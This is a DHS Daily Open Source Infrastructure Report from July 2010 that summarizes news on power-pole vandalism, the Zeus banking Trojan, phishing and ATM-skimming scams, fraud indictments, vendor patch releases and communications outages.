Department of Homeland Security Daily Open Source Infrastructure Report

Wednesday, July 14, 2010

Complete DHS Daily Report for July 14, 2010

Daily Report

Top Stories

•According to the Associated Press,authorities in Franklin County, Illinois say vandals used chain saws to cut down at least a half dozen rural power poles July 11, leaving residents and businesses without electricity. The poles included ones carrying 69,000-volt transmission lines.

2. July 12, Associated Press – (Illinois) Vandals use chain saws to down power poles. Authorities in Franklin County, Illinois said vandals used chain saws to cut down some rural power poles, leaving dozens of residents and businesses without electricity. Investigators said at least a half dozen poles were brought down Sunday evening by vandals who as of Monday afternoon were still at large. The poles included ones carrying 69,000-volt transmission lines for Southern Illinois Power Cooperative, and 12,500-volt distribution lines belonging to Southeastern Illinois Electric Cooperative. Electricity to most of the affected customers had been restored by Monday afternoon. Source:,0,5373085.story

•DarkReading reports that 38 defendants from across the United States have been charged with participating in a black market travel agent ring that used the stolen identities of thousands of victims to purchase airline tickets for customers, resulting in an estimated total loss of more than $20 million to numerous domestic airline companies, financial institutions, other merchants, and cardholders. See item 18 below in the Banking and Finance Sector.


Banking and Finance Sector

14. July 13, The Register – (International) Zeus baddies unleash nasty new bank Trojan. Hackers have created a new version of the Zeus crimeware toolkit that’s designed to swipe bank log-in details of Spanish, German, U.K. and U.S. banks. The malware payload, described by CA as Zeus version 3, is far more selective in the banks it targets. Previous versions targeted financial institutions around the world while the latest variant comes in two flavors: one that only target banks in Spain and Germany, and a second that only targets financial institutions in the U.K. and U.S. In addition, the latest version of Zeus contains features that make it far harder for security researchers to figure out what the malware is doing. Zombie drones on the Zeus botnet operate on a need to know basis, CA explains. “In earlier versions, Zeus handles this configuration file in a way that security researchers can easily manage to reverse engineer and capture the actual full configuration content,” writes a senior research engineer with CA’s Internet Security Business Unit. “This is no longer the case for the latest Zeus bot version 3, which is already in the wild. Command and control systems associated with the bot are “mostly hosted in Russia.” Source:

15. July 13, Computerworld – (International) IBM takes blame for massive bank system failure. IBM took responsibility for a major IT system failure suffered by one of Singapore’s largest banks July 5, saying an employee’s error caused the outage. In a statement released June 13, IBM said problems started when software-monitoring tools detected “instability” within DBS Bank’s storage system. While the storage system remained “fully functional,” IBM employees initiated a recovery process to fix the issue. “Unfortunately, a failure to apply the correct procedure inadvertently caused the service outage,” IBM said, adding that no data was lost. The outage knocked DBS’ IT systems offline for seven hours, leaving customers unable to withdraw money from automatic teller machines. All of the bank’s commercial and consumer banking systems were affected, although no data was lost, the bank said at the time. Source:

16. July 13, Sophos – (International) Malicious ‘Payment request from’ email attack strikes inboxes. Malicious hackers have spammed out the latest incarnation of a campaign designed to compromise computers — this time disguising their e-mails as though they were payment requests from eBay. The e-mails have a blank message body, but have a file called form.html attached. Many people are tempted to open the attachment to find out what the e-mail is about. Opening the attachment (which Sophos detects as Troj/JSRedir-BV) redirects a user’s Web browser to a recently compromised Web page on a legitimate site infected with Mal/Iframe-Q. Two things happen if the attachment is opened. Firstly, the browser is redirected to a spam-related Web site. This may make a user believe the attack is merely designed to advertise medications on behalf of the spammers. However, a malicious iFrame also downloads further malware from other third-party Web sites, including versions of the ZBot family. Source:

17. July 12, CNN – (Virginia) Man falsely claiming to have explosive device taken into custody. A man who walked into a Wachovia bank in downtown Harrisonburg, Virginia, claiming falsely to have an explosive device on him has been taken into custody without anyone being hurt, police said July 12. The incident began at 9:18 a.m., when the man — with duct tape covering what appeared to be a bulky object on his back — walked into the bank and announced he had an explosive device, a spokeswoman for the Harrisonburg Police Department said. Employees and customers evacuated the building, after which — at about 10:30 a.m. — the man also walked out, the department said in a news release. No explosive device was found, the motive is unclear and no charges were filed, police said. Source:

18. July 12, DarkReading – (National) Feds indict 38 in alleged ‘black market travel agent’ ring. Thirty-eight defendants from across the United States have been charged with participating in a multimillion-dollar, black-market, travel-agent ring that used the stolen identities of thousands of victims to purchase airline tickets for customers. “What began as a local, law enforcement investigation ultimately exposed an extensive nationwide black market for airline tickets,” said the U.S. attorney for the Western District of Missouri. “Six federal indictments allege that 38 defendants used stolen credit and debit card information from thousands of identity theft victims to purchase tickets, which they sold to their customers at a steep discount,” the U.S. attorney explained. “These separate criminal conspiracies resulted in an estimated total loss of more than $20 million to numerous domestic airline companies, financial institutions, other merchants, and cardholders.” Conspirators used several strategies to obtain the credit and debit card information of identity-theft victims, according to the federal indictments. In some cases, conspirators allegedly purchased stolen information from unindicted co-conspirators in Bangladesh, Vietnam, and elsewhere. Some of the defendants allegedly stole customer information at hotels, a bank, and a customer call center where defendants were employed. This stolen identity information was allegedly used by other conspirators — identified as black market travel agents — to purchase airline tickets at no cost to themselves. They used computers and cell phones to make online purchases through the Web sites of various airlines, the indictments say, utilizing not only private Internet connections but also public Internet connections at airports, hotels, libraries, and other businesses. They often purchased reservations close to the time of departure in order to increase the likelihood their fraudulent purchases would not be detected, the indictments say. As a result, a passenger could often complete his or her trip before the credit or debit card was detected as being compromised. Source:

19. July 12, Brickhouse Security – (National) ATM skimmer attacks now targeting bank PIN numbers. Most people have heard about ATM skimmers — devices designed to look like and replace an ATM’s card insertion slot. When an unsuspecting ATM user swipes a credit card through the fake dummy slot, the skimmer makes a digital copy of the ATM’s magnetic strip, making it easy for thieves to use a victim’s credit card as they please. However, a new twist on this scam not only copies credit-card information, but also captures PINs. The new tool goes on top of the ATM’s PIN pad and like the ATM skimmer, users are unable to tell that anything is out of the norm. The plastic PIN pad captures the PIN as it is typed in, and many automatically text message the stolen PINs directly to the scammer’s cell phone. Since information is transmitted remotely, the scammer never has to return back to the scene of the crime to capture the information, therefore minimizing risk tenfold. Source:

20. July 12, Denver Post – (National) Six indicted in Colorado on bank fraud charges. A national, bank-fraud ring, originally based in California, has been broken up in Colorado after a state grand jury indicted six of the members, the Colorado attorney general announced July 12. According to the indictment, the six individuals scammed thousands of dollars from Colorado banks and businesses. Also hit were banks and firms in Utah, Nebraska, North Dakota, Illinois, and Wisconsin. The indictment alleges the ring made fake credit cards and obtained 1-800 numbers, printed on the back of cards. When cashiers at the bank or sales people at the stores were unable to authenticate the fake credit cards, they would call the 800 number, which rang to other members of the ring, according to the indictment. The attorney general said ring members answering the phones would convince bank and store employees that the cards were legitimate, thus allowing for purchases and cash advances. Among the businesses hit were Enterprise Rent-a-Car in Aurora, Colorado and Revolution 2, a clothing store in Aurora. Among the Colorado banks targeted were the Dolores State Bank, Cortez; the Montrose Bank, Montrose; Valley Bank & Trust, Brighton; and the Colorado Community Bank in Castle Rock. The attorney general said losses exceeded $65,000. Source:

21. July 12, KTRK 13 Houston – (Texas) Suspected bank robber fatally shot by cop. A suspected bank robber is dead after being stopped by Pasadena, Texas, police July 12. At about 9:25 a.m., Pasadena police said the man entered the Chase Bank in the 5100 block of Fairmont Parkway. He placed a device on the counter that resembled a pipe bomb. Authorities said the man demanded money, got it and then fled. He was soon spotted by a Pasadena police officer responding to a silent alarm. The officer gave chase, demanding the suspect stop. The suspect ran to a nearby strip center, where the officer spotted him struggling to remove a gun from his waistband. Police said the officer repeatedly commanded the suspect to stop and he apparently did not. The officer, fearing the suspect might hurt someone in one of the businesses at the strip center, opened fire. The bank was evacuated because of the device the suspect placed on the counter. The bomb squad was called and a robotic device sent in to investigate. Police discovered an eight-inch piece of pipe wrapped in duct tape with electrical wires coming from it. It was safely removed for further inspection. No one in the bank was injured. Source:

Information Technology

44. July 13, Help Net Security – (International) iTunes users should strengthen iTunes passwords following second hack. It has been a second bad weekend for Apple, following another alleged app-driven hack of its iTunes store. iTunes users should now change the password on their iTunes account as well as switching to a prepaid debit card. Recent reports indicate a second hacker has been using a similar approach to the Vietnamese group, which appears to have ramped a range of apps with similar names to the top of a section on the App store, said Fortify’s chief products officer. “Over the 4th of July weekend, a Vietnamese group used the same strategy to ramp its apps to the top of the book charts on the App Store. This time around it seems it’s the travel section that’s been hit,” he said. “The clever aspect of this hacking strategy is that iTunes members will see an app at the top of the charts and download it, if only to see what all the fuss is about, and then open themselves up to a obfuscated malware infection or, more likely, see their iTunes account details being lifted and misused,” he added. Source:

45. July 13, The Register – (International) Facebook for hackers shut down in Pakistan. Five alleged hackers have been arrested by Pakistani authorities in raids that led to the closure the Pakbugs hacking and carding forum. The operation, run by Pakistan’s Cyber Crime department of Federal Investigation Agency (FIA), followed complaints by “national and multinational organizations” over a series of Web site defacements and hack attacks. Pakbugs is blamed for running amok across thousands of Web sites belonging to various governmental and non-governmental organizations in Pakistan and elsewhere, local telecoms blog PakSpider reports. Police seized computer equipment during the arrests of the five suspects. A Pakistani government press statement said the suspects are thought to have expertise in a range of cybercrime techniques, including botnet management, phishing and carding. F-Secure noted that was a full service cybercrime forum that offered a venue to discuss hacking techniques and a marketplace for the sale of malware code, bank logins and stolen credit card numbers. Last year, someone hacked into the forum and posted confidential information to a full disclosure mailing list. The data posted included logins, e-mail addresses and password hashes, the Finnish net security firm said. Source:

46. July 13, Computer Weekly – (International) Microsoft’s July Patch Tuesday to fix zero-day vulnerabilities. Microsoft’s monthly Patch Tuesday security update due for release July 13 is small with only four bulletins. Two are aimed at addressing flaws in the Windows operating system and two for the Microsoft Office suite of productivity software. Both Windows bulletins have a maximum rating of critical and both address previously disclosed vulnerabilities. The first is for Windows XP and 2003 and fixes the Windows Help and Support Center vulnerability published by a Google security researcher in June. The second Windows bulletin fixes a problem in the AERO display driver component for Windows 7 and Windows Server 2008 R2, which was disclosed publicly in May. The two remaining bulletins, one ranked critical and one important, are for Microsoft Office. Apart from the recently-released Office 2010, all versions of Office are affected, including Office XP, Office 2003 and Office 2007. The impact of the critical bulletin will be limited to businesses that have built applications and processes using Microsoft Access. Source:

47. July 13, Softpedia – (International) New AOL phishing campaign in the wild. Security researchers warn of a new phishing campaign targeting AOL users. Rogue e-mails claim that users need to update their personal and billing information in order to continue receiving services. Sophos reports that these phishing e-mails are sent to everyone, but are particularly tailored to AOL paying customers. The hxxp:// link actually points to a fake Web site hosted on a domain previously associated with other phishing schemes. Further investigation by Sophos researchers of the IP addresses and WHOIS information used in this attack, revealed a different scam abusing Amazon’s affiliate payment system. “Some IPs associated with this attack are storing pre-populated WordPress SQL files containing all the wonderful fake comments about the products they purchased through this series of bogus blogs. All they need to do is search and replace a product name, import the SQL, and voila, instant website,” a senior security advisor at Sophos Canada, explained. The phishing page has elements of the real AOL Web site, but what stands out is the unusually high level of details users are asked for. This scam’s victims will end up exposing their Social Security number, date of birth, driver’s license number and even their mother’s maiden name, a piece of information usually required by security questions. Source:

48. July 12, – (International) Facebook users ‘trolled’ by World Cup mischief maker. Facebook users were warned to be on their guard against scammers June 12 after it emerged that 150,000 people were taken in by a Facebook FIFA World Cup 2010 group on the site which was set up by an online mischief-maker, or “troll.” The user set up the group at the beginning of the tournament, facilitating numerous discussions throughout the month-long event which attracted a large following, and chose the final whistle of the World Cup final to spring his surprise. “Well, the 2010 FIFA World Cup is over and thank f**k for that, because I F***ING HATE FOOTBALL,” he wrote on the site’s wall. Trend Micro’s senior security adviser warned that, although the hoaxer appears to have had no criminal intent, the incident proves that people need to be less trusting on social networking sites. Source:

49. July 12, eWeek – (International) Third-Party software bugs pose big danger, Secunia finds. Secunia concluded that a mistaken belief that Microsoft and the operating system are the primary attack vectors has caused some organizations to let their guards down when it comes to security for third-party applications. Software vendors need to do a better job of making it easy for users to update their computers, Secunia said. It is calling out application vendors for poor updating practices and reminding users that third-party software vulnerabilities — and not bugs in the operating system — are the main targets of attackers. In the Secunia Half Year Report 2010, the company said it found the number of vulnerabilities affecting the average end-user PC reached 380, almost 90 percent of the total (420) found in all of 2009. On average, 10 vendors—including heavyweights Microsoft, Apple and Oracle — are responsible for 38 percent of all vulnerabilities, Secunia said. Apple led the way and the other four companies with the most vulnerabilities were Oracle, Microsoft, Hewlett-Packard and Adobe Systems. For PC users, the threat of unpatched third-party apps is not abating. According to Secunia, a typical end-user PC with 50 programs installed had more than three times as many vulnerabilities in the 24 third-party programs than in the 26 Microsoft programs installed. Source:

50. July 12, IDG News Service – (International) Oracle to issue 59 critical patches. Oracle July 13 will release 59 patches to fix security weaknesses affecting hundreds of products, according to a Web site notice. Twenty-one vulnerabilities affect products related to Solaris, the Unix operating system Oracle acquired through its purchase of Sun Microsystems. Seven can be exploited remotely over a network without requiring a password or username, Oracle said. The Solaris products include OpenSSO, Solaris Studio, Sun Convergence and Glassfish Enterprise Server. The update also includes 13 patches for Oracle’s database product line. Seven are for remotely exploitable vulnerabilities in the TimesTen in-memory database component and the Secure Backup product. Those weaknesses received CVSS (Common Vulnerability Scoring System) scores of 10, the most severe on the scale. Seven other fixes target Fusion Middleware products. Another 16 are for E-Business Suite, PeopleSoft, JD Edwards and other applications. One patch is for an issue with Enterprise Manager. Oracle recommends that users apply the patches as soon as possible. Source:

For more stories, see items 15, 16, and 17 above in the Banking and Finance Sector

Communications Sector

51. July 13, The Register – (International) PegasHosting gets its wings clipped. A cybercrime-friendly Ukrainian ISP PegasHosting was partially taken offline July 13. The main range of IP addresses used by the ISP — which has been associated with hosting phishing mule scam sites and other criminal activity — has been null-routed, following action by one of its upstream providers. “Hosted web sites include fake pharmacies, fake job sites, hacking, porn and what appear to be fake dating sites,” security blog reports. “Blocking the entire ( - will probably do you no harm.” PegasHosting continues to operate through other IP ranges associated with two different upstream providers. Security campaigners are lobbying these providers, one of which feeds into Global Crossing, to pull the plug on PegasHosting. Source:

52. July 13, SourceWire – (International) Ipswitch survey reveals U.K. bandwidth use during World Cup surged to 95% of capacity. Ipswitch Inc.’s Network Management Division July 13 released the final results from its World Cup Network Traffic Calculator. Throughout the World Cup international soccer tournament, it has collected over 1,200 responses related to normal bandwidth use and the increases seen during the 30 days of the tournament. Key findings: In total, global bandwidth use increased by over a third during the World Cup; there was huge interest in offices of both finalist nations, with Spain seeing an increase of 95 percent which was over five times predicted, and offices in Holland saw bandwidth use hit 97 percent during their key matches; in the U.K., actual bandwidth increase was comparable and far worse than expected with those surveyed citing an actual increase of 43 percent, to 95 percent (whereas network managers originally predicted an increase of only 31 percent); average bandwidth use hit 81 percent in participating World Cup nations; Europe-wide bandwidth use almost doubled from 40 percent current average bandwidth use, to 76 percent during key match times; and even the U.S. was caught up in football fever over the past month, with bandwidth use rising to 77 percent during some key matches. Source:

53. July 12, Baltimore Sun – (Maryland) WTMD temporarily off the air: Power outage blamed. A power outage at Towson University in Maryland knocked radio station WTMD-FM off the air July 12, but the station went back on the air by 3:15 p.m. that day. A power outage that affected the entire campus was to blame for the outages affecting the FM signal and streaming services, according to a message on the station’s Web site. WTMD’s general manager said workers had been upgrading the network in the building that houses the station, so “we knew that streaming would be down.” Towson University is the license holder of the public radio station. Source:

54. July 12, Kittanning Paper – (Pennsylvania) Telephone service outage reported in South Bend Township. Windstream Telephone Company advised July 12 that there are approximately 150 customers in the South Bend Township area of Armstrong County, Pennsylvania without phone service. Those customers are not able to dial out on their landline telephone. Cell phones will still work. Those who do not have a cell phone or cell phone coverage can go to the Elderton Fire Department at 305 Williams Street. Source: